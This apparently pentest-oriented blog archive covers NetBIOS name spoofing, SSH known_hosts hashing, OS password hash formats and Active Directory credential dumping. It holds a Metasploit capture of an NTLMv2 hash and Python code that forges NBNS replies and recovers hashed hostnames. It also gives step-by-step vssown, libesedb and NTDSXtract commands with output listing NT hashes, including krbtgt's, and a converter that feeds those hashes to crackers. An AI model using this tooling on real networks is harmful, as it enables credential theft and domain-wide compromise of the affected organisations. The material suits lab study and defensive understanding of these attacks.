Tag Archive: hashes

NetBIOS spoofing

There have been several posts regarding NetBIOS spoofing, and I thought I would write something up regarding it.

When a Windows machine tries to access a resource on the network it first has to resolve the resource's name to an IP address. It starts with its local hosts file and, if that fails (and it generally does), tries DNS. DNS doesn't have records for everything, so the Windows machine falls back to NetBIOS name resolution: if no WINS server is configured, it sends a NetBIOS Name Service (NBNS) broadcast to the local subnet asking whether anyone knows the name. Any host on that subnet can answer, so a machine we control can claim the name and the client will connect to us, usually over SMB, and authenticate.

How often do machines fall back to NetBIOS queries? More often than you would think. Laptops that are joined to a domain but sitting on a different (for example wireless) network keep querying for corporate resources that only resolve on the internal DNS. Companies often have an internal website reachable by a short single-label name. And most web browsers, when you type a single word into the address bar, have to decide whether you want a local resource or a search, so they issue a name lookup for that word first.

msf  auxiliary(smb) > use auxiliary/spoof/nbns/nbns_response
msf  auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the NB Name to determine if spoofed reply is sent
   SPOOFIP                     yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf  auxiliary(nbns_response) > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST                       yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf  auxiliary(smb) > set JOHNPWFILE /pentest/passwords/wordlists/darkc0de.lst
JOHNPWFILE => /pentest/passwords/wordlists/darkc0de.lst
msf  auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf  auxiliary(smb) > [*] 2012-01-29 09:45:40 -0500
NTLMv2 Response Captured from
USER:keith DOMAIN:cheeze-it OS: LM:
NTHASH:******hash************* NT_CLIENT_CHALLENGE:****************************************************
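
Added example, not part of the original post or of Metasploit: the NBNS name query a client broadcasts and the poisoned response that a spoofer like nbns_response sends back, built from the RFC 1002 wire format so you can see exactly what goes over UDP/137. The name INTRANET, the transaction ID 0x1234 and the spoof address 10.0.0.5 are constructed values.

```python
import re
import socket
import struct

NB_TYPE = 0x0020             # RR type NB: NetBIOS general name service record
NB_CLASS = 0x0001            # Internet class
FLAGS_QUERY_BCAST = 0x0110   # opcode QUERY, B (broadcast) and RD bits: what a B-node client sends
FLAGS_POS_RESPONSE = 0x8500  # R (response), AA (authoritative), RD: a positive name query response


def encode_nb_name(name, suffix=0x20):
    """First-level encoding of a NetBIOS name (RFC 1002 section 4.1): the name is
    upper-cased and space-padded to 15 bytes, the 16th byte is the service suffix
    (0x20 = file server, 0x00 = workstation), and every byte is split into two
    nibbles that each get 'A' (0x41) added. Returned with its length byte and the
    terminating zero label, 34 bytes in total."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append((b >> 4) + 0x41)
        encoded.append((b & 0x0F) + 0x41)
    return bytes([32]) + bytes(encoded) + b"\x00"


def decode_nb_name(wire):
    """Inverse of encode_nb_name; returns (name, suffix)."""
    if len(wire) < 34 or wire[0] != 32 or wire[33] != 0:
        raise ValueError("not a first-level encoded NetBIOS name")
    body = wire[1:33]
    raw = bytes(((body[i] - 0x41) << 4) | (body[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_nbns_query(trn_id, name, suffix=0x20):
    """The broadcast NAME QUERY REQUEST a Windows client sends to UDP/137."""
    header = struct.pack("!HHHHHH", trn_id, FLAGS_QUERY_BCAST, 1, 0, 0, 0)
    return header + encode_nb_name(name, suffix) + struct.pack("!HH", NB_TYPE, NB_CLASS)


def parse_nbns_query(pkt):
    """Return (trn_id, name, suffix) for a name query request, or None for
    anything else (responses, registrations, truncated packets)."""
    if len(pkt) < 12 + 34 + 4:
        return None
    trn_id, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    is_response = bool(flags & 0x8000)
    opcode = (flags >> 11) & 0x0F
    if is_response or opcode != 0 or qdcount != 1:
        return None
    try:
        name, suffix = decode_nb_name(pkt[12:46])
    except ValueError:
        return None
    qtype, qclass = struct.unpack("!HH", pkt[46:50])
    if qtype != NB_TYPE or qclass != NB_CLASS:
        return None
    return trn_id, name, suffix


def build_nbns_response(trn_id, name, suffix, spoof_ip, ttl=300):
    """POSITIVE NAME QUERY RESPONSE (RFC 1002 section 4.2.13) claiming NAME lives at
    SPOOF_IP. The transaction ID must echo the query's so the client accepts it;
    NB_FLAGS 0x0000 means unique name, B-node owner."""
    header = struct.pack("!HHHHHH", trn_id, FLAGS_POS_RESPONSE, 0, 1, 0, 0)
    rr = encode_nb_name(name, suffix) + struct.pack("!HHIH", NB_TYPE, NB_CLASS, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(spoof_ip)
    return header + rr + rdata


def spoofed_reply(pkt, spoof_ip, regex=".*"):
    """Per-packet logic of a spoofer: parse the query, apply REGEX to the requested
    name (the module's REGEX option), return the poisoned reply bytes or None."""
    parsed = parse_nbns_query(pkt)
    if parsed is None:
        return None
    trn_id, name, suffix = parsed
    if not re.match(regex, name):
        return None
    return build_nbns_response(trn_id, name, suffix, spoof_ip)


if __name__ == "__main__":
    # Constructed traffic: a client asks for INTRANET<20>, the spoofer answers with 10.0.0.5.
    query = build_nbns_query(0x1234, "INTRANET")
    reply = spoofed_reply(query, "10.0.0.5", regex="^INTRA")
    print(parse_nbns_query(query), reply.hex())
```

Two things worth noticing in the bytes: the 16th byte of the encoded name is the service the client wants, so a spoofer can answer only file-server (<20>) lookups if it likes, and the response carries no authentication at all, which is the whole reason the attack works. One practical note on the capture transcript above: JOHNPWFILE is an output prefix, not a wordlist, so pointing it at darkc0de.lst simply writes the captured hashes into files next to that wordlist.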

SSH KnownHosts

When you SSH into a server, OpenSSH stores the server's hostname/IP address together with the server's public host key. It does this so that if the server later presents a different key you get a loud warning: either you are the target of a man in the middle attack, or the host key on the server has genuinely changed. This information is stored in your home directory under .ssh/known_hosts (and system-wide in /etc/ssh/ssh_known_hosts).

For a pentester this information is useful. If your account is compromised, an attacker can read this file to see which machines you have SSH'd into, and then try your username, password or keys against each of them. OpenSSH can hash each entry instead of storing the name in the clear. To enable it, put 'HashKnownHosts yes' in ~/.ssh/config or in /etc/ssh/ssh_config (for all users), then run 'ssh-keygen -H' to hash your existing entries. ssh-keygen -H leaves the unhashed original behind as ~/.ssh/known_hosts.old, so delete that file afterwards or the hashing achieves nothing.

The '|' characters are separators; everything between them is one value. The first is the hash_magic, I'm not really sure what that is for. The 2nd is the salt, base64 encoded; the 3rd is the hashed hostname/IP; and what follows, after a space, is the host's public key (key type and base64 key data). The hostname/IP is hashed with HMAC-SHA1, using the decoded salt as the HMAC key, and the result is base64 encoded. Because the salt sits right there in the entry, an attacker with a list of candidate hostnames can still test each one against every entry; hashing stops casual reading, not targeted guessing.
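
Added example (not code from the original post): how a hashed known_hosts entry is built and checked, and how a pentester with a candidate list recovers hostnames from it anyway. The salt, hostnames and key strings are constructed placeholders, not real hosts.

```python
import base64
import hashlib
import hmac
import os

HASH_MAGIC = "|1|"   # marks a hashed entry; "1" is the only scheme OpenSSH defines (HMAC-SHA1)


def hash_known_host(hostname, salt=None):
    """Build the hashed host field of a known_hosts line:
    |1|base64(salt)|base64(HMAC-SHA1(key=salt, msg=hostname)).
    OpenSSH uses a fresh random 20-byte salt per entry; a fixed one is only
    accepted here so the example is reproducible. Non-default ports are
    hashed in the form "[host]:port"."""
    if salt is None:
        salt = os.urandom(hashlib.sha1().digest_size)
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return HASH_MAGIC + base64.b64encode(salt).decode() + "|" + base64.b64encode(digest).decode()


def parse_known_hosts_line(line):
    """Return (host_field, key_type, key_base64) or None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 2)
    return tuple(parts) if len(parts) == 3 else None


def host_matches(host_field, candidate):
    """True when CANDIDATE is the host behind HOST_FIELD, hashed or not.
    Plain entries can list several names separated by commas (hostname,ip)."""
    if host_field.startswith(HASH_MAGIC):
        _, _, salt_b64, digest_b64 = host_field.split("|", 3)
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        actual = hmac.new(salt, candidate.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(actual, expected)
    return candidate in host_field.split(",")


def recover_hosts(known_hosts_text, candidates):
    """Offline 'un-hashing': test every candidate name against every entry.
    Returns {host_field: matched_candidate or None}. Because the salt is in
    the entry, hashing only stops casual reading; anyone with a decent list of
    names (shell history, DNS zone, other hosts' known_hosts) gets them back."""
    result = {}
    for line in known_hosts_text.splitlines():
        parsed = parse_known_hosts_line(line)
        if parsed is None:
            continue
        host_field = parsed[0]
        result[host_field] = next((c for c in candidates if host_matches(host_field, c)), None)
    return result


# Constructed sample file: fixed salt and dummy key material, not real hosts.
SAMPLE_SALT = bytes(range(20))
SAMPLE_KNOWN_HOSTS = "\n".join([
    hash_known_host("db1.corp.example", SAMPLE_SALT) + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDUMMYKEY",
    "gw.corp.example,10.0.0.1 ssh-rsa AAAAB3NzaC1yc2EAAAADUMMYKEY",
])

if __name__ == "__main__":
    print(recover_hosts(SAMPLE_KNOWN_HOSTS, ["web.corp.example", "db1.corp.example", "10.0.0.1"]))
```

Each entry has its own salt, so a recovered name from one line tells you nothing about the others; what makes recovery cheap is that HMAC-SHA1 is fast and the candidate space (hostnames on the same network) is small.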


I’ve been wanting to do this for a while, but never got around to it. This is a list of common operating systems and the password hashing algorithms they use. This list is by no means comprehensive.

LM HASH (Lan Manager)
Windows NT through Windows Server 2003 store both the LM hash and the NT hash of each password; starting with Windows Vista and Server 2008, LM hash storage is disabled by default. LM Hash is not really a hash: "A hash is a mathematical function used to summarize or probabilistically identify data. LM instead uses a cryptographic one-way function (OWF). Instead of encrypting the password with some other key, the password itself is the key." The LM hash is generated by:

  1. Convert all lower case characters in the password to upper case, so it is case-insensitive
  2. Pad the password with NULL characters until it is exactly 14 characters long; anything beyond 14 is trimmed
  3. Split the password into two 7-character chunks
  4. Use each 7-byte chunk (expanded to an 8-byte DES key) to DES-encrypt the fixed string "KGS!@#$%"
  5. Concatenate the two 8-byte ciphertexts into a 16-byte (128-bit) value and store that

This construction leaves a tiny effective keyspace: the password is case-insensitive, at most 14 characters, and each 7-character half can be cracked independently (a half that is all NULLs always encrypts to AAD3B435B51404EE, which tells you the password is 7 characters or shorter). This hash is stored in the SAM file.

NT HASH
This hash is also pretty basic: the password is converted to Unicode (UTF-16LE) and an MD4 digest of that is taken, with no salt, so identical passwords always produce identical hashes. This password hash is also stored in the SAM file.

MSCACHE (DCC)
By default, on Windows systems joined to an Active Directory domain, the credentials of the last 10 users to log on are cached locally so they can still log on when no domain controller is reachable; they are stored as MSCache (Domain Cached Credentials) hashes. They live in the registry under HKEY_LOCAL_MACHINE\SECURITY\Cache, in the values NL$1 through NL$10. To read them you need SYSTEM rights, or you have to change the ACL on the key. The hashes are generated by:

  1. Apply the NT hash algorithm (MD4 of the UTF-16LE password) to the password
  2. Convert the username to lowercase and then to Unicode (UTF-16LE)
  3. Concatenate 1 and 2 and take the MD4 hash of the result

MSCACHE2 (DCC2)
MSCache2 was released with Windows Vista and is an improvement over MSCache, because the iteration count makes it far slower to brute force. It is generated by:

  1. Compute the MSCache (DCC) hash as above
  2. Apply PBKDF2 with HMAC-SHA1, an iteration count of 10240, the DCC hash as the password and the lowercase Unicode username as the salt to generate the DCC2 (MSCash2) hash. Only the first 128 bits of the 160-bit output are used.

Active Directory
Good write-up is available here

Linux
It depends on how the system is configured. Older distributions used salted MD5 (md5crypt); current ones default to salted SHA-512. If you look at your /etc/shadow file you will see something like the following:
We are only concerned with what comes after root:. The hash field has the form $id$salt$hash. The id after the first $ identifies the hashing algorithm: 1 is MD5, 2a (or 2b/2y) is bcrypt (Blowfish-based), 5 is SHA-256 and 6 is SHA-512; the SHA variants may also carry a rounds=N parameter before the salt. After the next $ comes the salt, and after the final $ the password hash itself. You can change the algorithm by editing the PAM configuration (pam_unix) or, on Red Hat-based systems, with the authconfig command. When you change your password the system calls the crypt library, and if you select an algorithm your crypt does not support it falls back to MD5; glibc 2's crypt supports the SHA-256 and SHA-512 variants.
The salt is generated randomly (I think, couldn't really find much on this) and is used when creating the hash. Here is an example
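
As an added example (not from the original post), a parser for the shadow hash field described above, plus the audit a pentester or admin would run over the file: which accounts still use DES or MD5, which have a low round count, and which have an empty password field. The sample lines are constructed and the hash strings are placeholders, not real digests.

```python
# Modular crypt format identifiers that show up in the hash field of /etc/shadow.
ALGORITHMS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}
# Fixed or default iteration counts used when no rounds= parameter is present.
DEFAULT_ROUNDS = {"md5crypt": 1000, "sha256crypt": 5000, "sha512crypt": 5000}
# What an audit should flag: DES crypt is 8 characters max with a 12-bit salt,
# md5crypt is fast and its round count cannot be raised.
WEAK = {"descrypt", "md5crypt"}


def parse_shadow_line(line):
    """Parse one /etc/shadow line into a dict describing its password field.
    Handles $id$[rounds=N$]salt$hash, bcrypt's $2b$cost$saltHash, yescrypt's
    $y$params$salt$hash, legacy 13-character DES, empty fields (no password
    needed) and locked accounts (! or * prefix, possibly in front of a hash)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow line: " + line)
    info = {"user": fields[0], "no_password": False, "locked": False,
            "algorithm": None, "rounds": None, "salt": None, "hash": None}
    field = fields[1]
    if field == "":
        info["no_password"] = True
        return info
    if field[0] in "!*":
        info["locked"] = True
        field = field.lstrip("!*")
        if not field:
            return info                          # locked, no hash stored behind it
    if not field.startswith("$"):
        info.update(algorithm="descrypt", salt=field[:2], hash=field[2:])
        return info
    parts = field.split("$")[1:]                 # drop the empty string before the first $
    ident, rest = parts[0], parts[1:]
    algo = ALGORITHMS.get(ident, "unknown($" + ident + "$)")
    info["algorithm"] = algo
    if algo == "bcrypt":                         # $2b$12$<22-char salt><31-char hash>, cost is log2
        info.update(rounds=2 ** int(rest[0]), salt=rest[1][:22], hash=rest[1][22:])
        return info
    if algo == "yescrypt":                       # $y$params$salt$hash; cost lives inside params
        info.update(salt=rest[1], hash=rest[2])
        return info
    if rest and rest[0].startswith("rounds="):
        info["rounds"] = int(rest[0][len("rounds="):])
        rest = rest[1:]
    else:
        info["rounds"] = DEFAULT_ROUNDS.get(algo)
    info.update(salt=rest[0], hash=rest[1] if len(rest) > 1 else "")
    return info


def audit_shadow(text, min_rounds=5000):
    """Run the parser over a whole shadow file and return (user, finding) pairs."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        e = parse_shadow_line(line)
        if e["no_password"]:
            findings.append((e["user"], "empty password field: logs in without a password"))
        elif e["locked"]:
            continue
        elif e["algorithm"] in WEAK:
            findings.append((e["user"], "weak hash: " + e["algorithm"]))
        elif e["rounds"] is not None and e["rounds"] < min_rounds and e["algorithm"] != "bcrypt":
            findings.append((e["user"], "low round count: %d" % e["rounds"]))
    return findings


# Constructed sample; the hash strings are placeholders, not real digests.
SAMPLE_SHADOW = "\n".join([
    "root:$6$rounds=65536$saltsalt$FAKESHA512HASH:15600:0:99999:7:::",
    "keith:$6$saltsalt$FAKESHA512HASH:15600:0:99999:7:::",
    "alice:$y$j9T$FAKESALT$FAKEYESCRYPTHASH:15600:0:99999:7:::",
    "legacy:$1$abcdefgh$FAKEMD5HASH:15600:0:99999:7:::",
    "olduser:abFAKEDESHASH:15600:0:99999:7:::",
    "svc-backup:!$6$saltsalt$FAKESHA512HASH:15600:0:99999:7:::",
    "nobody:*:15600:0:99999:7:::",
    "kiosk::15600:0:99999:7:::",
    "bob:$2b$12$" + "s" * 22 + "h" * 31 + ":15600:0:99999:7:::",
])

if __name__ == "__main__":
    for user, finding in audit_shadow(SAMPLE_SHADOW):
        print(user, "-", finding)
```

The locked-with-hash case (svc-backup) matters in practice: passwd -l only prefixes the field with "!", so the original hash is still there and still crackable if the file leaks, even though the account cannot log on with it.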


MD5 Password Cracking

Password hashes can take a long time to crack, depending on the hash and the complexity of the password. Why spend all that time cracking a password when someone else has already done the work? Introducing BozoCrack. BozoCrack is a Ruby script that searches Google for an MD5 hash and, if Google has it, returns the plaintext password.

Description from Bozocrack

“BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.”


root@bt:~# ruby /pentest/passwords/bozocrack/bozocrack.rb md5.txt
Loaded 6 unique hashes

Active Directory Password Dump

So I've seen a few posts on dumping password hashes from Active Directory. The concept is pretty simple: you use VSS (Volume Shadow Copy) to copy the SYSTEM and ntds.dit files, then you can use a tool written by Csaba Barta to extract the hashes. Since VSS is enabled by default on 2008, this should be pretty simple. There is a VBScript out that will do this for you, called VSSOwn. I was able to create copies of the SYSTEM and ntds.dit files, but was not able to extract the hashes. Why? Csaba Barta's tool doesn't currently work with 64-bit systems, bummer. Since I don't have a 32-bit version to test with I'm out of luck. Anyway a nice write-up is available here

Update –

Decided to try it again, since a 64-bit version of the tool was released. So first run

cscript vssown.vbs /create

To create the volume shadow copy then run

cscript vssown.vbs /list

To confirm that it worked, then copy the SYSTEM and ntds.dit files out of the shadow copy.

Download libesedb and NTDSXtract (current version is 1.0).

Then run the following:

root@bt:~# cd libesedb-20120102/ 
root@bt:~/libesedb-20120102# ./configure  && make

Lots of text scrolls by 🙂

root@bt:~/libesedb-20120102# cd esedbtools/ 
root@bt:~/libesedb-20120102/esedbtools# ./esedbexport /root/ntds.dit
esedbexport 20120102

Opening file. 
Exporting table 1 (MSysObjects) out of 12. 
Exporting table 2 (MSysObjectsShadow) out of 12. 
Exporting table 3 (MSysUnicodeFixupVer2) out of 12. 
Exporting table 4 (datatable) out of 12. 
Exporting table 5 (hiddentable) out of 12. 
Exporting table 6 (link_table) out of 12. 
Exporting table 7 (sdpropcounttable) out of 12. 
Exporting table 8 (sdproptable) out of 12. 
Exporting table 9 (sd_table) out of 12. 
Exporting table 10 (MSysDefrag2) out of 12. 
Exporting table 11 (quota_table) out of 12. 
Exporting table 12 (quota_rebuild_progress_table) out of 12. 
Export completed. 
root@bt:~/libesedb-20120102/esedbtools# cd ntds.dit.export/ 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# ls 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp datatable.3 /root 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp link_table.5 /root 

Now we can use dsusers.py to extract the hashes

root@bt:~/NTDSXtract 1.0# python ./dsusers.py /root/datatable.3 /root/link_table.5 --passwordhashes /root/SYSTEM
Running with options:
Extracting password hashes
Initialising engine...
Scanning database - 100% -> 3491 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============
Record ID:           3562 
User name:           Administrator 
User principal name: 
SAM Account name:    Administrator 
GUID: aa7020f0-d702-4608-bb51-4f9901113317 
SID:  S-1-5-21-2539783424-2987255661-3794136379-500 
When created:         2011-09-18 16:19:03 
When changed:         2012-02-05 15:24:36 
Account expires:      Never 
Password last set:    2012-02-05 15:24:36.328125 
Last logon:           2012-02-05 15:25:12.078125 
Last logon timestamp: 2012-02-05 15:24:36.328125 
Bad password time     2012-02-05 15:23:29.375000 
Logon count:          25 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users Administrator 
Password hashes: Administrator:$NT$9bff06fe611486579fb74037890fda96::: 
Record ID:           3563 
User name:           Guest 
User principal name: 
SAM Account name:    Guest 
GUID: 01b08029-af28-4f0b-a6be-e39a9eff6bfa 
SID:  S-1-5-21-2539783424-2987255661-3794136379-501 
When created:         2011-09-18 16:19:04 
When changed:         2011-09-18 16:19:04 
Account expires:      Never 
Password last set:    Never 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled PWD Not Required NORMAL_ACCOUNT PWD Never Expires 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users Guest 
Password hashes: 
Record ID:           3609 
User name:           krbtgt 
User principal name: 
SAM Account name:    krbtgt 
GUID: 290688a7-60a4-4baa-b860-33eda516793a 
SID:  S-1-5-21-2539783424-2987255661-3794136379-502 
When created:         2011-09-18 16:22:35 
When changed:         2011-09-18 16:37:59 
Account expires:      Never 
Password last set:    2011-09-18 16:22:35.843750 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users krbtgt 
Password hashes: krbtgt:$NT$ef9fde1c17c72af73beb84f7702724c9::: 
Record ID:           3763 
User name:           keith 
User principal name: keith@keithsoffice.us 
SAM Account name:    keith 
GUID: 74f63277-6bed-42ea-bdd9-4c9498c2f1d3 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1103 
When created:         2011-09-18 16:57:38 
When changed:         2012-02-05 15:23:54 
Account expires:      Never 
Password last set:    2012-02-05 15:23:54.203125 
Last logon:           2012-02-05 15:23:55.812500 
Last logon timestamp: 2012-02-05 15:23:54.187500 
Bad password time     2011-12-11 04:24:51.625875 
Logon count:          15 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users keith 
Password hashes: keith:$NT$8c3efc486704d2ee71eebe71af14d86c::: 
Record ID:           3764 
User name:           keith domain admin 
User principal name: keith-dm@keithsoffice.us 
SAM Account name:    keith-dm 
GUID: 7fbe82fd-eb65-4862-8626-d2127add7283 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1104 
When created:         2011-09-18 16:58:24 
When changed:         2011-10-04 01:58:23 
Account expires:      Never 
Password last set:    2011-10-04 01:57:08.171875 
Last logon:           2011-10-04 02:01:29.359375 
Last logon timestamp: 2011-10-04 01:58:23.781250 
Bad password time     2011-09-18 20:54:49.250000 
Logon count:          9 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users keith domain admin 
Password hashes: keith domain admin:$NT$58a478135a93ac3bf058a5ea0e8fdb71::: 
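
Added example (not code from the original post or from NTDSXtract): a parser for the dsusers.py output above that turns it into pwdump-format lines for John or hashcat, skipping disabled accounts so you do not burn cracking time on passwords nobody can log on with. The sample text is constructed in the shape of the output above, reusing its SIDs and NT hash values.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty/absent password
NT_RE = re.compile(r":\$NT\$([0-9a-fA-F]{32})")
LM_RE = re.compile(r":\$LM\$([0-9a-fA-F]{32})")


def parse_dsusers_output(text):
    """Split dsusers.py output into one dict per 'Record ID:' block, keeping the
    fields a cracking run cares about: SAM name, SID/RID, account control flags, hashes."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Record ID:"):
            current = {"record_id": int(line.split(":", 1)[1]), "sam": None,
                       "sid": None, "rid": None, "uac": "", "hashes": []}
            records.append(current)
        elif current is None:
            continue
        elif line.startswith("SAM Account name:"):
            current["sam"] = line.split(":", 1)[1].strip()
        elif line.startswith("SID:"):
            current["sid"] = line.split(":", 1)[1].strip()
            current["rid"] = int(current["sid"].rsplit("-", 1)[1])   # last SID component
        elif line.startswith("User Account Control:"):
            current["uac"] = line.split(":", 1)[1].strip()
        elif line.startswith("Password hashes:"):
            value = line.split(":", 1)[1].strip()
            if value:
                current["hashes"].append(value)
        elif NT_RE.search(line) or LM_RE.search(line):
            current["hashes"].append(line)       # further hash lines under the same record
    return records


def is_enabled(record):
    """dsusers.py prints the ACCOUNTDISABLE flag as the word 'Disabled' in the UAC field."""
    return "Disabled" not in record["uac"]


def to_pwdump(records, include_disabled=False):
    """Emit user:rid:lmhash:nthash::: lines, the pwdump layout john and hashcat read
    directly. LM is absent in these dumps (2008 DC), so the empty-LM marker is used."""
    out = []
    for r in records:
        if r["sam"] is None or r["rid"] is None:
            continue
        if not include_disabled and not is_enabled(r):
            continue
        for h in r["hashes"]:
            nt = NT_RE.search(h)
            if not nt:
                continue
            lm = LM_RE.search(h)
            out.append("%s:%d:%s:%s:::" % (r["sam"], r["rid"],
                                           lm.group(1).lower() if lm else EMPTY_LM,
                                           nt.group(1).lower()))
            break                                # first NT hash is the current password
    return out


# Constructed sample in the shape of the output above (SIDs and hash values taken from it).
SAMPLE_DSUSERS = """\
List of users:
==============
Record ID:           3562
User name:           Administrator
SAM Account name:    Administrator
SID:  S-1-5-21-2539783424-2987255661-3794136379-500
User Account Control: NORMAL_ACCOUNT
Password hashes: Administrator:$NT$9bff06fe611486579fb74037890fda96:::
Record ID:           3563
User name:           Guest
SAM Account name:    Guest
SID:  S-1-5-21-2539783424-2987255661-3794136379-501
User Account Control: Disabled PWD Not Required NORMAL_ACCOUNT PWD Never Expires
Password hashes:
Record ID:           3609
User name:           krbtgt
SAM Account name:    krbtgt
SID:  S-1-5-21-2539783424-2987255661-3794136379-502
User Account Control: Disabled
Password hashes: krbtgt:$NT$ef9fde1c17c72af73beb84f7702724c9:::
Record ID:           3763
User name:           keith
SAM Account name:    keith
SID:  S-1-5-21-2539783424-2987255661-3794136379-1103
User Account Control: NORMAL_ACCOUNT
Password hashes: keith:$NT$8c3efc486704d2ee71eebe71af14d86c:::
"""

if __name__ == "__main__":
    for line in to_pwdump(parse_dsusers_output(SAMPLE_DSUSERS)):
        print(line)
```

krbtgt is always disabled and is skipped by default here, but do not throw its hash away: it is the key that signs every Kerberos ticket in the domain, which is why a dump of ntds.dit is a domain-wide compromise rather than a list of passwords to crack.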

Have Fun!

Sources: http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html